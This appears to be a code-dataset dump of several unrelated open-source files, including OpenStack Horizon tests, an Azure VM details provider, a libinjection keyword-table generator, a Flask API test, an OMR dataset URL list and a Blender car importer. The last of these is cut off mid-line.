repo_name
stringlengths
5
92
path
stringlengths
4
232
copies
stringclasses
19 values
size
stringlengths
4
7
content
stringlengths
721
1.04M
license
stringclasses
15 values
hash
int64
-9,223,277,421,539,062,000
9,223,102,107B
line_mean
float64
6.51
99.9
line_max
int64
15
997
alpha_frac
float64
0.25
0.97
autogenerated
bool
1 class
m3z/HT
openstack_dashboard/dashboards/admin/instances/tests.py
1
6158
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2012 Nebula, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from django import http from django.core.urlresolvers import reverse from django.utils.datastructures import SortedDict from mox import IsA from openstack_dashboard import api from openstack_dashboard.test import helpers as test class InstanceViewTest(test.BaseAdminViewTests): @test.create_stubs({api.nova: ('flavor_list', 'server_list',), api.keystone: ('tenant_list',)}) def test_index(self): servers = self.servers.list() flavors = self.flavors.list() tenants = self.tenants.list() api.keystone.tenant_list(IsA(http.HttpRequest), admin=True).\ AndReturn(tenants) api.nova.server_list(IsA(http.HttpRequest), all_tenants=True).AndReturn(servers) api.nova.flavor_list(IsA(http.HttpRequest)).AndReturn(flavors) self.mox.ReplayAll() res = self.client.get(reverse('horizon:admin:instances:index')) self.assertTemplateUsed(res, 'admin/instances/index.html') instances = res.context['table'].data self.assertItemsEqual(instances, servers) @test.create_stubs({api.nova: ('flavor_list', 'flavor_get', 'server_list',), api.keystone: ('tenant_list',)}) def test_index_flavor_list_exception(self): servers = self.servers.list() tenants = self.tenants.list() flavors = self.flavors.list() full_flavors = SortedDict([(f.id, f) for f in flavors]) api.nova.server_list(IsA(http.HttpRequest), all_tenants=True).AndReturn(servers) api.nova.flavor_list(IsA(http.HttpRequest)). \ AndRaise(self.exceptions.nova) api.keystone.tenant_list(IsA(http.HttpRequest), admin=True).\ AndReturn(tenants) for server in servers: api.nova.flavor_get(IsA(http.HttpRequest), server.flavor["id"]). \ AndReturn(full_flavors[server.flavor["id"]]) self.mox.ReplayAll() res = self.client.get(reverse('horizon:admin:instances:index')) self.assertTemplateUsed(res, 'admin/instances/index.html') instances = res.context['table'].data self.assertItemsEqual(instances, servers) @test.create_stubs({api.nova: ('flavor_list', 'flavor_get', 'server_list',), api.keystone: ('tenant_list',)}) def test_index_flavor_get_exception(self): servers = self.servers.list() flavors = self.flavors.list() tenants = self.tenants.list() max_id = max([int(flavor.id) for flavor in flavors]) for server in servers: max_id += 1 server.flavor["id"] = max_id api.nova.server_list(IsA(http.HttpRequest), all_tenants=True).AndReturn(servers) api.nova.flavor_list(IsA(http.HttpRequest)). \ AndReturn(flavors) api.keystone.tenant_list(IsA(http.HttpRequest), admin=True).\ AndReturn(tenants) for server in servers: api.nova.flavor_get(IsA(http.HttpRequest), server.flavor["id"]). \ AndRaise(self.exceptions.nova) self.mox.ReplayAll() res = self.client.get(reverse('horizon:admin:instances:index')) instances = res.context['table'].data self.assertTemplateUsed(res, 'admin/instances/index.html') self.assertMessageCount(res, error=len(servers)) self.assertItemsEqual(instances, servers) @test.create_stubs({api.nova: ('server_list',)}) def test_index_server_list_exception(self): api.nova.server_list(IsA(http.HttpRequest), all_tenants=True).AndRaise(self.exceptions.nova) self.mox.ReplayAll() res = self.client.get(reverse('horizon:admin:instances:index')) self.assertTemplateUsed(res, 'admin/instances/index.html') self.assertEqual(len(res.context['instances_table'].data), 0) @test.create_stubs({api: ('server_get', 'flavor_get',), api.keystone: ('tenant_get',)}) def test_ajax_loading_instances(self): server = self.servers.first() flavor = self.flavors.list()[0] tenant = self.tenants.list()[0] api.server_get(IsA(http.HttpRequest), server.id).AndReturn(server) api.flavor_get(IsA(http.HttpRequest), server.flavor['id']).AndReturn(flavor) api.keystone.tenant_get(IsA(http.HttpRequest), server.tenant_id, admin=True).AndReturn(tenant) self.mox.ReplayAll() url = reverse('horizon:admin:instances:index') + \ "?action=row_update&table=instances&obj_id=" + server.id res = self.client.get(url, {}, HTTP_X_REQUESTED_WITH='XMLHttpRequest') self.assertTemplateUsed(res, "horizon/common/_data_table_row.html") self.assertContains(res, "test_tenant", 1, 200) self.assertContains(res, "instance-host", 1, 200) self.assertContains(res, "server_1", 1, 200) self.assertContains(res, "10.0.0.1", 1, 200) self.assertContains(res, "512MB RAM | 1 VCPU | 0 Disk", 1, 200) self.assertContains(res, "Active", 1, 200) self.assertContains(res, "Running", 1, 200)
apache-2.0
-3,204,556,978,701,150,700
42.985714
78
0.603118
false
QualiSystems/Azure-Shell
package/cloudshell/cp/azure/domain/common/vm_details_provider.py
1
5896
from azure.mgmt.compute.models import StorageAccountTypes from cloudshell.cp.core.models import VmDetailsProperty, VmDetailsData, VmDetailsNetworkInterface from cloudshell.cp.azure.domain.vm_management.operations.deploy_operation import get_ip_from_interface_name class VmDetailsProvider(object): def __init__(self, network_service, resource_id_parser): """ :param cloudshell.cp.azure.domain.services.network_service.NetworkService network_service: :param AzureResourceIdParser resource_id_parser: :return: """ self.network_service = network_service self.resource_id_parser = resource_id_parser def create(self, instance, is_market_place, logger, network_client, group_name): """ :param group_name: :param network_client: :param instance: azure.mgmt.compute.models.VirtualMachine :param is_market_place: bool :param logging.Logger logger: :return: """ vm_instance_data = None vm_network_data = None if is_market_place: vm_instance_data = self._get_vm_instance_data_for_market_place(instance) vm_network_data = self._get_vm_network_data(instance, network_client, group_name, logger) logger.info("VM {} was created via market place.".format(instance.name)) else: vm_instance_data = self._get_vm_instance_data_for_custom_image(instance) vm_network_data = self._get_vm_network_data(instance, network_client, group_name, logger) logger.info("VM {} was created via custom image.".format(instance.name)) return VmDetailsData(vmInstanceData=vm_instance_data, vmNetworkData=vm_network_data) @staticmethod def _get_vm_instance_data_for_market_place(instance): data = [ VmDetailsProperty(key='Image Publisher',value= instance.storage_profile.image_reference.publisher), VmDetailsProperty(key='Image Offer',value= instance.storage_profile.image_reference.offer), VmDetailsProperty(key='Image SKU',value= instance.storage_profile.image_reference.sku), VmDetailsProperty(key='VM Size',value= instance.hardware_profile.vm_size), VmDetailsProperty(key='Operating System',value= instance.storage_profile.os_disk.os_type.name), VmDetailsProperty(key='Disk Type',value= 'HDD' if instance.storage_profile.os_disk.managed_disk.storage_account_type == StorageAccountTypes.standard_lrs else 'SSD') ] return data def _get_vm_instance_data_for_custom_image(self, instance): image_name = self.resource_id_parser.get_image_name(resource_id=instance.storage_profile.image_reference.id) resource_group = self.resource_id_parser.get_resource_group_name(resource_id=instance.storage_profile.image_reference.id) data = [ VmDetailsProperty(key='Image',value= image_name), VmDetailsProperty(key='Image Resource Group',value= resource_group), VmDetailsProperty(key='VM Size',value= instance.hardware_profile.vm_size), VmDetailsProperty(key='Operating System',value= instance.storage_profile.os_disk.os_type.name), VmDetailsProperty(key='Disk Type',value= 'HDD' if instance.storage_profile.os_disk.managed_disk.storage_account_type == StorageAccountTypes.standard_lrs else 'SSD') ] return data def _get_vm_network_data(self, instance, network_client, group_name, logger): network_interface_objects = [] for network_interface in instance.network_profile.network_interfaces: nic_name = self.resource_id_parser.get_name_from_resource_id(network_interface.id) nic = network_client.network_interfaces.get(group_name, nic_name) ip_configuration = nic.ip_configurations[0] private_ip = ip_configuration.private_ip_address public_ip = '' network_data = [VmDetailsProperty(key="IP", value=ip_configuration.private_ip_address)] subnet_name = ip_configuration.subnet.id.split('/')[-1] current_interface = VmDetailsNetworkInterface(interfaceId=nic.resource_guid, networkId=subnet_name, isPrimary=nic.primary, networkData=network_data, privateIpAddress=private_ip, publicIpAddress=public_ip) if ip_configuration.public_ip_address: public_ip_name = get_ip_from_interface_name(nic_name) public_ip_object = self.network_service.get_public_ip(network_client=network_client, group_name=group_name, ip_name=public_ip_name) public_ip = public_ip_object.ip_address network_data.append(VmDetailsProperty(key="Public IP", value=public_ip)) network_data.append( VmDetailsProperty(key="Public IP Type", value=public_ip_object.public_ip_allocation_method)) # logger.info("VM {} was created with public IP '{}'.".format(instance.name, # ip_configuration.public_ip_address.ip_address)) logger.info("VM {} was created with public IP '{}'.".format(instance.name, public_ip)) network_data.append(VmDetailsProperty(key="MAC Address", value=nic.mac_address)) network_interface_objects.append(current_interface) return network_interface_objects
apache-2.0
8,312,419,053,083,852,000
53.100917
150
0.61652
false
fengjian/libinjection
src/sqlparse2c.py
3
3800
#!/usr/bin/env python # # Copyright 2012, 2013 Nick Galbreath # nickg@client9.com # BSD License -- see COPYING.txt for details # """ Converts a libinjection JSON data file to a C header (.h) file """ import sys def toc(obj): """ main routine """ print """ #ifndef LIBINJECTION_SQLI_DATA_H #define LIBINJECTION_SQLI_DATA_H #include "libinjection.h" #include "libinjection_sqli.h" typedef struct { const char *word; char type; } keyword_t; static size_t parse_money(sfilter * sf); static size_t parse_other(sfilter * sf); static size_t parse_white(sfilter * sf); static size_t parse_operator1(sfilter *sf); static size_t parse_char(sfilter *sf); static size_t parse_hash(sfilter *sf); static size_t parse_dash(sfilter *sf); static size_t parse_slash(sfilter *sf); static size_t parse_backslash(sfilter * sf); static size_t parse_operator2(sfilter *sf); static size_t parse_string(sfilter *sf); static size_t parse_word(sfilter * sf); static size_t parse_var(sfilter * sf); static size_t parse_number(sfilter * sf); static size_t parse_tick(sfilter * sf); static size_t parse_ustring(sfilter * sf); static size_t parse_qstring(sfilter * sf); static size_t parse_nqstring(sfilter * sf); static size_t parse_xstring(sfilter * sf); static size_t parse_bstring(sfilter * sf); static size_t parse_estring(sfilter * sf); static size_t parse_bword(sfilter * sf); """ # # Mapping of character to function # fnmap = { 'CHAR_WORD' : 'parse_word', 'CHAR_WHITE': 'parse_white', 'CHAR_OP1' : 'parse_operator1', 'CHAR_UNARY': 'parse_operator1', 'CHAR_OP2' : 'parse_operator2', 'CHAR_BANG' : 'parse_operator2', 'CHAR_BACK' : 'parse_backslash', 'CHAR_DASH' : 'parse_dash', 'CHAR_STR' : 'parse_string', 'CHAR_HASH' : 'parse_hash', 'CHAR_NUM' : 'parse_number', 'CHAR_SLASH': 'parse_slash', 'CHAR_SEMICOLON' : 'parse_char', 'CHAR_COMMA': 'parse_char', 'CHAR_LEFTPARENS': 'parse_char', 'CHAR_RIGHTPARENS': 'parse_char', 'CHAR_LEFTBRACE': 'parse_char', 'CHAR_RIGHTBRACE': 'parse_char', 'CHAR_VAR' : 'parse_var', 'CHAR_OTHER': 'parse_other', 'CHAR_MONEY': 'parse_money', 'CHAR_TICK' : 'parse_tick', 'CHAR_UNDERSCORE': 'parse_underscore', 'CHAR_USTRING' : 'parse_ustring', 'CHAR_QSTRING' : 'parse_qstring', 'CHAR_NQSTRING' : 'parse_nqstring', 'CHAR_XSTRING' : 'parse_xstring', 'CHAR_BSTRING' : 'parse_bstring', 'CHAR_ESTRING' : 'parse_estring', 'CHAR_BWORD' : 'parse_bword' } print print "typedef size_t (*pt2Function)(sfilter *sf);" print "static const pt2Function char_parse_map[] = {" pos = 0 for character in obj['charmap']: print " &%s, /* %d */" % (fnmap[character], pos) pos += 1 print "};" print # keywords # load them keywords = obj['keywords'] for fingerprint in list(obj[u'fingerprints']): fingerprint = '0' + fingerprint.upper() keywords[fingerprint] = 'F' needhelp = [] for key in keywords.iterkeys(): if key != key.upper(): needhelp.append(key) for key in needhelp: tmpv = keywords[key] del keywords[key] keywords[key.upper()] = tmpv print "static const keyword_t sql_keywords[] = {" for k in sorted(keywords.keys()): if len(k) > 31: sys.stderr.write("ERROR: keyword greater than 32 chars\n") sys.exit(1) print " {\"%s\", '%s'}," % (k, keywords[k]) print "};" print "static const size_t sql_keywords_sz = %d;" % (len(keywords), ) print "#endif" return 0 if __name__ == '__main__': import json sys.exit(toc(json.load(sys.stdin)))
bsd-3-clause
-4,710,446,708,618,401,000
27.787879
73
0.604211
false
inconvergent/differential-cloud
modules/helpers.py
1
1866
#!/usr/bin/python # -*- coding: utf-8 -*- from __future__ import print_function def get_args(): import argparse parser = argparse.ArgumentParser() parser.add_argument( '--procs', type=int, default=4, help='number of processors.' ) parser.add_argument( '--nearl', type=float, default=0.003 ) parser.add_argument( '--midl', type=float, default=0.008 ) parser.add_argument( '--farl', type=float, default=0.05 ) parser.add_argument( '--stp', type=float, default=1.0e-7 ) parser.add_argument( '--reject', type=float, default=1.0 ) parser.add_argument( '--attract', type=float, default=0.3 ) parser.add_argument( '--nmax', type=int, default=1000000 ) parser.add_argument( '--itt', type=int, default=10000000000 ) parser.add_argument( '--vnum', type=int, default=10000000000 ) parser.add_argument( '--stat', type=int, default=100 ) parser.add_argument( '--export', type=int, default=1000 ) parser.add_argument( '--out', type=str, default='./res/res' ) parser.add_argument( '--startRad', type=float, default=0.01 ) parser.add_argument( '--startNum', type=int, default=100 ) return parser.parse_args() def make_info_str(args): s = '' for k in vars(args): s += '# ' + str(k) + ': ' + str(getattr(args,k)) + '\n' return s def print_stats(steps,dm, meta=False): from time import strftime from time import time if isinstance(meta, str): meta = ' | {:s}'.format(meta) else: meta = '' print( '{:s} | stp: {:d} sec: {:.2f} v: {:d}{:s}' .format( strftime('%d/%m/%y %H:%M:%S'), steps, time()-dm.get_start_time(), dm.get_vnum(), meta ) ) return
mit
-6,956,966,956,868,832,000
14.55
59
0.546088
false
SpaceHotDog/Flask_API
test_bucketlist.py
1
3171
# test_bucketlist.py import unittest import os import json from app import create_app, db class BucketlistTestCase(unittest.TestCase): """This class represents the bucketlist test case""" def setUp(self): """Define test variables and initialize app.""" self.app = create_app(config_name="testing") self.client = self.app.test_client self.bucketlist = {'name': 'Go to Borabora for vacation'} # binds the app to the current context with self.app.app_context(): # create all tables db.create_all() def test_bucketlist_creation(self): """Test API can create a bucketlist (POST request)""" res = self.client().post('/bucketlists/', data=self.bucketlist) self.assertEqual(res.status_code, 201) self.assertIn('Go to Borabora', str(res.data)) def test_api_can_get_all_bucketlists(self): """Test API can get a bucketlist (GET request).""" res = self.client().post('/bucketlists/', data=self.bucketlist) self.assertEqual(res.status_code, 201) res = self.client().get('/bucketlists/') self.assertEqual(res.status_code, 200) self.assertIn('Go to Borabora', str(res.data)) def test_api_can_get_bucketlist_by_id(self): """Test API can get a single bucketlist by using it's id.""" rv = self.client().post('/bucketlists/', data=self.bucketlist) self.assertEqual(rv.status_code, 201) result_in_json = json.loads(rv.data.decode('utf-8').replace("'", "\"")) result = self.client().get( '/bucketlists/{}'.format(result_in_json['id'])) self.assertEqual(result.status_code, 200) self.assertIn('Go to Borabora', str(result.data)) def test_bucketlist_can_be_edited(self): """Test API can edit an existing bucketlist. (PUT request)""" rv = self.client().post( '/bucketlists/', data={'name': 'Eat, pray and love'}) self.assertEqual(rv.status_code, 201) rv = self.client().put( '/bucketlists/1', data={ "name": "Dont just eat, but also pray and love :-)" }) self.assertEqual(rv.status_code, 200) results = self.client().get('/bucketlists/1') self.assertIn('Dont just eat', str(results.data)) def test_bucketlist_deletion(self): """Test API can delete an existing bucketlist. (DELETE request).""" rv = self.client().post( '/bucketlists/', data={'name': 'Eat, pray and love'}) self.assertEqual(rv.status_code, 201) res = self.client().delete('/bucketlists/1') self.assertEqual(res.status_code, 200) # Test to see if it exists, should return a 404 result = self.client().get('/bucketlists/1') self.assertEqual(result.status_code, 404) def tearDown(self): """teardown all initialized variables.""" with self.app.app_context(): # drop all tables db.session.remove() db.drop_all() # Make the tests conveniently executable if __name__ == "__main__": unittest.main()
unlicense
-8,130,678,617,017,852,000
37.670732
79
0.600442
false
apacha/OMR-Datasets
omrdatasettools/OmrDataset.py
1
11026
from enum import Enum, auto from typing import Dict class OmrDataset(Enum): """ The available OMR datasets that can be automatically downloaded with Downloader.py """ #: The Audiveris OMR dataset from https://github.com/Audiveris/omr-dataset-tools, Copyright 2017 by Hervé Bitteur under AGPL-3.0 license Audiveris = auto() #: The Baro Single Stave dataset from http://www.cvc.uab.es/people/abaro/datasets.html, Copyright 2019 Arnau Baró, Pau Riba, Jorge Calvo-Zaragoza, and Alicia Fornés under CC-BY-NC-SA 4.0 license Baro = auto() #: The Capitan dataset from http://grfia.dlsi.ua.es/, License unspecified, free for research purposes Capitan = auto() #: Custom version of the CVC-MUSCIMA dataset that contains all images in grayscale, binary and with the #: following staff-line augmentations: interrupted, kanungo, thickness-variation-v1/2, y-variation-v1/2 #: typeset-emulation and whitespeckles. (all data augmentations that could be aligned automatically). #: The grayscale images are different from the WriterIdentification dataset, in such a way, that they were aligned #: to the images from the Staff-Removal dataset. This is the recommended dataset for object detection, as the #: MUSCIMA++ annotations can be used with a variety of underlying images. #: See https://github.com/apacha/CVC-MUSCIMA to learn more. CvcMuscima_MultiConditionAligned = auto() #: The larger version of the CVC-MUSCIMA dataset for staff removal in black and white with augmentations #: from http://www.cvc.uab.es/cvcmuscima/index_database.html, #: Copyright 2012 Alicia Fornés, Anjan Dutta, Albert Gordo and Josep Lladós under CC-BY-NC-SA 4.0 license CvcMuscima_StaffRemoval = auto() #: The smaller version of the CVC-MUSCIMA dataset for writer identification in grayscale #: from http://www.cvc.uab.es/cvcmuscima/index_database.html, #: Copyright 2012 Alicia Fornés, Anjan Dutta, Albert Gordo and Josep Lladós under CC-BY-NC-SA 4.0 license CvcMuscima_WriterIdentification = auto() #: Edirom dataset. All rights reserved Edirom_Bargheer = auto() #: Edirom datasets on Freischuetz from https://freischuetz-digital.de/edition.html. All rights reserved. Edirom_FreischuetzDigital = auto() #: The Fornes Music Symbols dataset from http://www.cvc.uab.es/~afornes/, License unspecified - citation requested Fornes = auto() #: The official HOMUS dataset from http://grfia.dlsi.ua.es/homus/, License unspecified. Homus_V1 = auto() #: The improved version of the HOMUS dataset with several bugs-fixed from https://github.com/apacha/Homus Homus_V2 = auto() #: The MUSCIMA++ dataset from https://ufal.mff.cuni.cz/muscima, Copyright 2017 Jan Hajic jr. under CC-BY-NC-SA 4.0 license MuscimaPlusPlus_V1 = auto() #: The second version of the MUSCIMA++ dataset from https://github.com/OMR-Research/muscima-pp MuscimaPlusPlus_V2 = auto() #: A sub-set of the MUSCIMA++ annotations that contains bounding-box annotations for staves, staff measures and system measures. It was semi-automatically constructed from existing annotations and manually verified for correctness. The annotations are available in a plain JSON format as well as in the COCO format. MuscimaPlusPlus_MeasureAnnotations = auto() #: The OpenOMR Symbols dataset from https://sourceforge.net/projects/openomr/, Copyright 2013 by Arnaud F. Desaedeleer under GPL license OpenOmr = auto() #: The Printed Music Symbols dataset from https://github.com/apacha/PrintedMusicSymbolsDataset, Copyright 2017 by Alexander Pacha under MIT license Printed = auto() #: The Rebelo dataset (part 1) with music symbols from http://www.inescporto.pt/~arebelo/index.php, Copyright 2017 by Ana Rebelo under CC BY-SA 4.0 license Rebelo1 = auto() #: The Rebelo dataset (part 2) with music symbols from http://www.inescporto.pt/~arebelo/index.php, Copyright 2017 by Ana Rebelo under CC BY-SA 4.0 license Rebelo2 = auto() #: The DeepScore dataset (version 1) with extended vocabulary from https://tuggeluk.github.io/downloads/, License unspecified. DeepScores_V1_Extended = auto() #: The AudioLabs v1 dataset (aka. Measure Bounding Box Annotation) from https://www.audiolabs-erlangen.de/resources/MIR/2019-ISMIR-LBD-Measures, Copyright 2019 by Frank Zalkow, Angel Villar Corrales, TJ Tsai, Vlora Arifi-Müller, and Meinard Müller under CC BY-NC-SA 4.0 license AudioLabs_v1 = auto() #: The AudioLabs v2 dataset, enhanced with staves, staff measures and the original system measures. The annotations are available in csv, JSON and COCO format. AudioLabs_v2 = auto() #: The Accidentals detection dataset by Kwon-Young Choi from https://www-intuidoc.irisa.fr/en/choi_accidentals/, License unspecified. ChoiAccidentals = auto() def get_dataset_download_url(self) -> str: """ Returns the url of the selected dataset. Example usage: OmrDataset.Fornes.get_dataset_download_url() """ return self.dataset_download_urls()[self.name] def get_dataset_filename(self) -> str: """ Returns the name of the downloaded zip file of a dataset. Example usage: OmrDataset.Fornes.get_dataset_filename() """ return self.dataset_file_names()[self.name] def dataset_download_urls(self) -> Dict[str, str]: """ Returns a mapping with all URLs, mapped from their enum keys """ return { # Official URL: https://github.com/Audiveris/omr-dataset-tools/tree/master/data/input-images "Audiveris": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/AudiverisOmrDataset.zip", # Official URL: http://www.cvc.uab.es/people/abaro/datasets/MUSCIMA_ABARO.zip "Baro": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/BaroMuscima.zip", # Official URL: http://grfia.dlsi.ua.es/cm/projects/timul/databases/BimodalHandwrittenSymbols.zip "Capitan": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/BimodalHandwrittenSymbols.zip", # Official URL: http://www.cvc.uab.es/cvcmuscima/CVCMUSCIMA_WI.zip "CvcMuscima_WriterIdentification": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/CVCMUSCIMA_WI.zip", # Official URL: http://www.cvc.uab.es/cvcmuscima/CVCMUSCIMA_SR.zip "CvcMuscima_StaffRemoval": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/CVCMUSCIMA_SR.zip", # Official URL: https://github.com/apacha/CVC-MUSCIMA "CvcMuscima_MultiConditionAligned": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/CVCMUSCIMA_MCA.zip", "Edirom_Bargheer": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/Bargheer.zip", "Edirom_FreischuetzDigital": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/FreischuetzDigital.zip", # Official URL: http://www.cvc.uab.es/cvcmuscima/datasets/Music_Symbols.zip "Fornes": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/Music_Symbols.zip", # Official URL: http://grfia.dlsi.ua.es/homus/HOMUS.zip "Homus_V1": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/HOMUS.zip", # Official URL: https://github.com/apacha/Homus "Homus_V2": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/HOMUS-2.0.zip", # Official URL: https://lindat.mff.cuni.cz/repository/xmlui/bitstream/handle/11372/LRT-2372/MUSCIMA-pp_v1.0.zip?sequence=1&isAllowed=y "MuscimaPlusPlus_V1": "https://github.com/OMR-Research/muscima-pp/releases/download/v1.0/MUSCIMA-pp_v1.0.zip", # Official URL: https://github.com/OMR-Research/muscima-pp "MuscimaPlusPlus_V2": "https://github.com/OMR-Research/muscima-pp/releases/download/v2.0/MUSCIMA-pp_v2.0.zip", "MuscimaPlusPlus_Images": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/CVC_MUSCIMA_PP_Annotated-Images.zip", "MuscimaPlusPlus_MeasureAnnotations": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/MUSCIMA-pp_v1.0-measure-annotations.zip", # Official URL: https://sourceforge.net/projects/openomr/ "OpenOmr": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/OpenOMR-Dataset.zip", "Printed": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/PrintedMusicSymbolsDataset.zip", "Rebelo1": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/Rebelo-Music-Symbol-Dataset1.zip", "Rebelo2": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/Rebelo-Music-Symbol-Dataset2.zip", "DeepScores_V1_Extended": "https://repository.cloudlab.zhaw.ch/artifactory/deepscores/ds_extended.zip", # Official URL: https://www.audiolabs-erlangen.de/resources/MIR/2019-ISMIR-LBD-Measures "AudioLabs_v1": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/AudioLabs_v1.zip", "AudioLabs_v2": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/AudioLabs_v2.zip", # Official URL: https://www-intuidoc.irisa.fr/en/choi_accidentals/ "ChoiAccidentals": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/choi_accidentals_dataset.zip" } def dataset_file_names(self) -> Dict[str, str]: """ Returns a map of all file_names, mapped from their enum keys """ return { "Audiveris": "AudiverisOmrDataset.zip", "Baro": "BaroMuscima.zip", "Capitan": "BimodalHandwrittenSymbols.zip", "CvcMuscima_WriterIdentification": "CVCMUSCIMA_WI.zip", "CvcMuscima_StaffRemoval": "CVCMUSCIMA_SR.zip", "CvcMuscima_MultiConditionAligned": "CVCMUSCIMA_MCA.zip", "Edirom_Bargheer": "Bargheer.zip", "Edirom_FreischuetzDigital": "FreischuetzDigital.zip", "Fornes": "Music_Symbols.zip", "Homus_V1": "HOMUS.zip", "Homus_V2": "HOMUS-2.0.zip", "MuscimaPlusPlus_V1": "MUSCIMA-pp_v1.0.zip", "MuscimaPlusPlus_V2": "MUSCIMA-pp_v2.0.zip", "MuscimaPlusPlus_Images": "CVC_MUSCIMA_PP_Annotated-Images.zip", "MuscimaPlusPlus_MeasureAnnotations": "MUSCIMA-pp_v1.0-measure-annotations.zip", "OpenOmr": "OpenOMR-Dataset.zip", "Printed": "PrintedMusicSymbolsDataset.zip", "Rebelo1": "Rebelo-Music-Symbol-Dataset1.zip", "Rebelo2": "Rebelo-Music-Symbol-Dataset2.zip", "DeepScores_V1_Extended": "ds_extended.zip", "AudioLabs_v1": "AudioLabs_v1.zip", "AudioLabs_v2": "AudioLabs_v2.zip", "ChoiAccidentals": "choi_accidentals_dataset.zip" }
mit
-4,851,323,977,944,946,000
58.551351
319
0.699737
false
khrapovs/datastorage
datastorage/compustat.py
1
2589
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Short interest dynamics """ from __future__ import print_function, division import os import zipfile import datetime as dt import pandas as pd import matplotlib.pyplot as plt import seaborn as sns path = os.getenv("HOME") + '/Dropbox/Research/data/Compustat/data/' # __location__ = os.path.realpath(os.path.join(os.getcwd(), # os.path.dirname(__file__))) # path = os.path.join(__location__, path + 'Compustat/data/') def date_convert(string): return dt.datetime.strptime(string, '%d-%m-%Y') def import_data(): """Import data and save it to the disk. """ zf = zipfile.ZipFile(path + 'short_int.zip', 'r') name = zf.namelist()[0] short_int = pd.read_csv(zf.open(name), converters={'datadate': date_convert}) columns = {'datadate': 'date', 'SHORTINTADJ': 'short_int', 'GVKEY': 'gvkey'} short_int.rename(columns=columns, inplace=True) short_int.set_index(['gvkey', 'date'], inplace=True) short_int.sort_index(inplace=True) short_int.to_hdf(path + 'short_int.h5', key='short_int') print(short_int.head()) print(short_int.dtypes) print('Number of unique companies: ', short_int.index.get_level_values('gvkey').nunique()) print('Number of unique dates: ', short_int.index.get_level_values('date').nunique()) print('Min and Max date: ', short_int.index.get_level_values('date').min().date(), ',', short_int.index.get_level_values('date').max().date()) def load_data(): """Load data from disk and check for sanity. """ return pd.read_hdf(path + 'short_int.h5', 'short_int') def count_companies(short_int): """Plot number of companies over time. """ df = short_int.reset_index().groupby('date')['gvkey'].nunique() sns.set_context('paper') df.plot(figsize=(10, 3)) plt.show() data = df.ix[dt.date(2006, 1, 1):dt.date(2007, 6, 30)] data.plot(figsize=(10, 3)) plt.show() def mean_short_int(short_int): """Mean short interest on each date. """ df = short_int.groupby(level='date')['short_int'].mean() sns.set_context('paper') df.plot(figsize=(10, 3)) plt.show() df.ix[:dt.date(2004, 12, 31)].plot(figsize=(10, 3)) plt.show() df.ix[dt.date(2006, 1, 1):dt.date(2007, 6, 30)].plot(figsize=(10, 3)) plt.show() if __name__ == '__main__': import_data() short_int = load_data() count_companies(short_int) mean_short_int(short_int)
mit
2,111,269,302,578,816,300
24.382353
73
0.596756
false
Yethiel/re-volt-addon
io_revolt/parameters_in.py
1
4567
""" Name: parameters_in Purpose: Importing cars using the parameters.txt file Description: Imports entire cars using the carinfo module. """ if "bpy" in locals(): import imp imp.reload(common) imp.reload(carinfo) imp.reload(prm_in) import os import bpy import bmesh from mathutils import Vector from . import common from . import carinfo from . import prm_in from .common import * def import_file(filepath, scene): """ Imports a parameters.txt file and loads car body and wheels. """ PARAMETERS[filepath] = carinfo.read_parameters(filepath) # Imports the car with all supported files import_car(scene, PARAMETERS[filepath], filepath) # Removes parameters from dict so they can be reloaded next time PARAMETERS.pop(filepath) def import_car(scene, params, filepath): body = params["model"][params["body"]["modelnum"]] body_loc = to_blender_coord(params["body"]["offset"]) wheel0loc = to_blender_coord(params["wheel"][0]["offset1"]) wheel1loc = to_blender_coord(params["wheel"][1]["offset1"]) wheel2loc = to_blender_coord(params["wheel"][2]["offset1"]) wheel3loc = to_blender_coord(params["wheel"][3]["offset1"]) folder = os.sep.join(filepath.split(os.sep)[:-1]) # Checks if the wheel models exist wheel0_modelnum = int(params["wheel"][0]["modelnum"]) if wheel0_modelnum >= 0: wheel0 = params["model"][wheel0_modelnum] if wheel0.split(os.sep)[-1] in os.listdir(folder): wheel0path = os.sep.join([folder, wheel0.split(os.sep)[-1]]) else: wheel0 = None wheel1_modelnum = int(params["wheel"][1]["modelnum"]) if wheel1_modelnum >= 0: wheel1 = params["model"][wheel1_modelnum] if wheel1.split(os.sep)[-1] in os.listdir(folder): wheel1path = os.sep.join([folder, wheel1.split(os.sep)[-1]]) else: wheel1 = None wheel2_modelnum = int(params["wheel"][2]["modelnum"]) if wheel2_modelnum >= 0: wheel2 = params["model"][wheel2_modelnum] if wheel2.split(os.sep)[-1] in os.listdir(folder): wheel2path = os.sep.join([folder, wheel2.split(os.sep)[-1]]) else: wheel2 = None wheel3_modelnum = int(params["wheel"][3]["modelnum"]) if wheel3_modelnum >= 0: wheel3 = params["model"][wheel3_modelnum] if wheel3.split(os.sep)[-1] in os.listdir(folder): wheel3path = os.sep.join([folder, wheel3.split(os.sep)[-1]]) else: wheel3 = None # Checks if the body is in the same folder if body.split(os.sep)[-1] in os.listdir(folder): bodypath = os.sep.join([folder, body.split(os.sep)[-1]]) # Creates the car body and sets the offset body_obj = prm_in.import_file(bodypath, scene) body_obj.location = body_loc # Creates the wheel 